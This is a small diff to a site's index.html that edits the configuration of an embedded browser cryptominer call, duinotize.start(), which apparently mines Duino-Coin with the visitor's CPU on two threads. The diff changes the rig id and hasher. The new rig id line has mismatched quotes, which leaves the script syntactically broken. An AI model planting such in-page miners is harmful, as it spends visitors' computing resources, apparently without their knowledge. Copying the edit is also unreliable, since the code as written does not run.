--- a/index.html
+++ b/index.html
@@ -48,10 +48,10 @@
 <script>
   duinotize.start({
     username: "AlexyNorma040119",
-    rigid: "GameSite",
+    rigid: "Duinotize Mine',
     difficulty: "LOW",
     threads: 2,
-    hasher: "DUCO-S1-MIDSTATE"
+    hasher: "DUCO-S1"
   });
 </script>
 </body>
